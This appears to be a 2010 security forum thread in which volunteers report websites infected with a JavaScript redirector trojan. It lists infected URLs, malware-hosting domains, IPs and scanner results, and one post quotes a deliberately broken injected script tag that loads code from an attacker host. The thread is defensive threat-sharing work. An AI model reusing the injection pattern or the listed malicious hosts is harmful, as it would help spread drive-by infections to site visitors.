Source of infection...

Hi malware fighters,

This following site is a redirect for infection of the site mentioned below: http://www.UnmaskParasites.com/security-report/?page=n9uo.com
403. Forbidden

http://safeweb.norton.com/report/show?url=grantsalert.com%2F&x=10&y=8
What is there: Total threats on this site: 38 all instances of Trojan.Malscript!html
Of the 105 pages we tested on the site over the past 90 days, 88 pages resulted in malicious software being downloaded and installed without user consent, and the last time suspicious content was found on this site was on 2010-05-13.

Malicious software includes 91 scripting exploits. Successful infection resulted in an average of 2 new processes on the target machine.

Malicious software is hosted on 2 domain(s), including n9uocom/, sio3cn/.
See: http://safeweb.norton.com/report/show?url=sio3.cn&x=0&y=0
http://jsunpack.jeek.org/dec/go?report=61cfc9179bfe18905d4daa6a25cac414df04c50c

1 domain appear to be functioning as intermediaries for distributing malware to visitors of this site, including holeinone*com.tw/,

polonus

Hi malware fighters,

Similar malcode also detected here:

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/kmartemploymentapplications.html

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/americanpageanttest.html

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/taperfadehaircuts.html

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/dibujosdepreciousmomentsparapintar.html

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/mydisholivegardennetwork.html

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/graffitidrawingletter.html

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/picturesofeastcoastryders.html

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/picturesofbraids.html

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/trillfamadioslyrics.html

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/myspaceoverlayeditors.html\

Description here: htxp://traversecode.com/2009/12/29/trojan-malscripthtml/ (Is flagged by avast shield)

Avast detects this as: JS:Redirector-B (trj)

and an additional suspicious link found here: sexfunbeach.com suspicious :arrow_upper_right: - displaying 1 of 1

* <Script> link - htxp://sexfunbeach.com/blogs/moms/wp-content/plugins/index.php
Malicious software includes 42 exploit(s), 19 trojan(s), 6 scripting exploit(s).

Malicious software is hosted on 3 domains, including traffloads.in/, asfirey.net/, gumblar.cn/.

This site was hosted on 1 network(s) including AS6428 (CDM).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past sexfunbeach.com appeared to function as an intermediary for the infection of 6 sites including savemyporn.com/, siscon.com.br/, smutboxxx.com/.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 38 domain(s), including savemyporn.com/, smutboxxx.com/, sp-plan.co.jp/.

The nature of the content of the sites are a guarantee almost for added malware,
so stay away from/clear of pr0n sites,

polonus

VirusTotal - kmartemploymentapplications.html - 19/41
http://www.virustotal.com/analisis/ddfc3f3f242af192a2ef144bd994fa20948a75c44ce9a02ee5c2e08cb77d3867-1276555748

VirusTotal - trojan-malscripthtml.htm - 6/40
http://www.virustotal.com/analisis/e0d515af6d53831a794995b530846986894666afcc5cdf6be32cf06c3025edfd-1276555971

VirusTotal - index.php - 15/41
http://www.virustotal.com/analisis/fc74a7e9494ca42a36e867e8070a6b3377938e923e8f197997eb85d5aa4f0f82-1276556360

Another site with this malware found:

Threat Name: Trojan.Malscript!html
Location: htxp://astoncartersolicitors.com/

Threat Name: Trojan.Malscript!html
Location: htxp://astoncartersolicitors.com/index.html

Blocked by finjan: see the alert given attached/ShowBlock.aspx?transid=4C16F4ED

polonus

VirusTotal - index.html - 28/41
http://www.virustotal.com/analisis/961af977b5acbe7f901ff2c7e90fe3d3938a25772ee1ad393453fc998d3d29b9-1276620205

Hi malware fighters,

Another one found here:
Threat Name: Trojan.Malscript!html
Location: hxtp://www.kindergarten-zielstrasse.de/
finjan found: JS/Redirector-u aka JS/Dropper aka Trojan-Downloader.JS.Pegel.ac A

This does not find it: http://wepawet.iseclab.org/view.php?hash=f7f4353f6be53dfe63e3a2cf00b0b46e&t=1276699724&type=js
But what is: htxp://bestdarkstar.info:8080/google.com/imeem.com/ign.com.php NXDOMAIN application/x-empty
A known Joomla exploit and appearing in this blocklist: http://doc.emergingthreats.net/pub/Main/HoneywallSamples/hosts

Hi malware fighters,

And another one here:
labradory_krakow.republika.pl
Domain Hash ad873cf7c1d8d47dbdacfa4b1815def1
IP Address 213.180.128.160
IP Hostname gwiazdka.republika.pl
IP Country PL (Poland)
AS Number 12990
AS Name ONET-PL-AS1 Onet.pl portal network
Detections 4 / 18 (22 %)
Status DANGEROUS
Threat Name: Trojan.Malscript!html
Location: htxp://labradory_krakow.republika.pl/
2 suspicious inline scripts found.
Moreover, Google currently lists this page as suspicious*
Malicious software includes 2 exploits, 1 scripting exploits, 1 trojan - Troj/Iframe/DY
HTML/Crypted.Gen aka JS/Redir.AQ
Successful infection resulted in an average of 1 new process on the target machine.

Malicious software is hosted on 7 domains, including searchfunes.org/, mobi-print.com/, adingurj.com/.

2 domains appear to be functioning as intermediaries for distributing malware to visitors of this site, including scaraori.com/, eplarine.com/.

This site was hosted on 1 network(s) including AS5617 (Polish Telecom).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past months labradory_krakow.republika.pl appeared to function as an intermediary for the infection of 3 sites including mojpupil.pl/, labrador.toplista.pl/, hodowle.top-100.pl/,

also see WOT: http://www.mywot.com/en/scorecard/labrador.toplista.pl

Read up about the code shown as an attached image:
http://stackoverflow.com/questions/1224670/what-is-the-advantage-of-using-unescape-on-document-write-to-load-javacript

polonus

VirusTotal - kindergarten-zielstrasse.de.h - 25/41
http://www.virustotal.com/analisis/3666630390052874be3013cbaecf9310c7bcb6f2cb861520f8fb848fadd241c5-1276715747

VirusTotal - labradory_krakow.republika.pl.htm - 7/41
http://www.virustotal.com/analisis/92afaef392ff6077b74feffc6b2ddca0833680bbb05bbcb9ceea9652a64ff0a9-1276715754

Hi Pondus,

According to the second results, avast need detection there…
But according to the statistics here, avast detection rate for the malware should be 38%:
http://lists.clean-mx.com/clean-mx/md5.php?F_Prot=JS/Redir.AQ

pol

Hi malware fighters,

And what do you think 61 instances of it here: http://www.browserdefender.com/site/fear-crew-team.yoyo.pl/

Same trojan,

pol

Hi Pondus,

Now a Norwegian site that has this infection:
webactive24*at
Domain Hash b4a0ff422b989a8d382f1fbe8c5d2b0a
IP Address 213.188.130.108
IP Hostname linuxnl-www.active24.nl
IP Country NO (Norway)
AS Number 12994
AS Name Active ISP AS
Detections 7 / 19 (37 %)
Status DANGEROUS

Virus
Threat Name: Trojan.Malscript!html
Location: htxp://www.webactive24.at/

Drive-By Downloads
Threat Name: Trojan.Malscript!html
File name: c:\documents and settings\user\local settings\temporary internet files\content.ie5\ocieqgj3\webactive24[1].htm
Location: htxp://webactive24.at/

See the attached image of the malcode…
for lasio.ru see: http://www.google.com/safebrowsing/diagnostic?site=lasio.ru

polonus

VirusTotal - webactive24.at.htm - 28/41 ( Edit: WebSite is now CLEANED )
http://www.virustotal.com/analisis/5da6c6da967a4cb143a46ad9c27b9150e9d8435850064bc8ced16ca86d55f8ab-1276983902

Hi another site with malscript infection found, this time Czech site:

Threat Name: Trojan.Malscript!html
Location: hxtp://www.krach-cz.cz/index.htm
Analysis: htxp://jsunpack.jeek.org/dec/go?report=636f126aa098d95c0adaa1df68f0abfdcab909c4
Found benign here, but is infected with Troj/JSRedir-AK
http://wepawet.iseclab.org/view.php?hash=ef241bff79db6f86ab6377f253308307&t=1277643265&type=js
Location: hxtp://www.krach-cz.cz/
Our avast av detects JS-Illredir-H here,

polonus

Howdy malware fighters,

Here a list of dangerous subdomains:
http://safeweb.norton.com/report/show?url=oployau.fancountblogger.com.&x=13&y=10

sorydory.russellhowe.com. 3530 IN A 88.198.25.170
Threat Name: Bloodhound.Exploit.292
Location: htxp://sorydory.russellhowe.com:8080/Applet1.html

aospfpgy.dogplaystation.com. 2792 IN A 216.154.216.15
hreat Name: Bloodhound.Exploit.292
Location: htxp://aospfpgy.dogplaystation.com:8080/Applet1.html

kollinsoy.skyefenton.com. 399 IN A 194.150.236.199
Threat Name: Trojan.Malscript!html
Location: hxtp://kollinsoy.skyefenton.com:8080/HDMI.js

temp.hbsouthmomsclub.com. 1116 IN A 81.89.109.23
Threat Name: Trojan.Malscript!html
Location: htxp://temp.hbsouthmomsclub.com:8080/Notes1.pdf

The attack itself is nothing new. It uses stolen FTP credentials to inject malicious scripts into legitimate web pages. The injected scripts look like this:

 ^sc ript type="text/javascript" src="hxxp://oployau .fancountblogger .com:8080/YouTube*js"^^/sc ript^
<!--8469f3ebb36bebb12b39b0f9e7fe5933--^ code broken by me, pol

polonus

Hi malware fighters,

Another one: Threats found: 1
Here is a complete list:
Threat Name: Trojan.Malscript!html
Location: htxp://ee9kd.smartenergymodel.com/js/jquery.min.js
The last time suspicious content was found on this site was on 2010-07-08.
Malicious software includes 4 trojans, 4 exploits

This site was hosted on 2 network(s) including AS27473 (CIHOST), AS16276 (OVH).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, smartenergymodel.com appeared to function as an intermediary for the infection of 25 sitex including joby.cz/, cherokeestreetnews.org/, dixiequicks.com/.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 932 domains, including prettymematernity.com/, balioutbound.com/, turkescort.gen.tr/.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message,

polonus

only avast / Gdata have this

VirusTotal - jquery.min.js - 3/41
http://www.virustotal.com/analisis/f1c31d922ec1d2a7b257d6a012a773f5392021f01c89c4855f4787e865d97757-1278621328

Hi Pondus,

That is a sign they are attentive ;D

pol

Hi Pondus,

Thanks for making that Norwegian site safe for the users: http://forum.avast.com/index.php?topic=60161.msg514256#msg514256
All on the Internet should be grateful for such efforts,

your co-malware-fighter,

polonus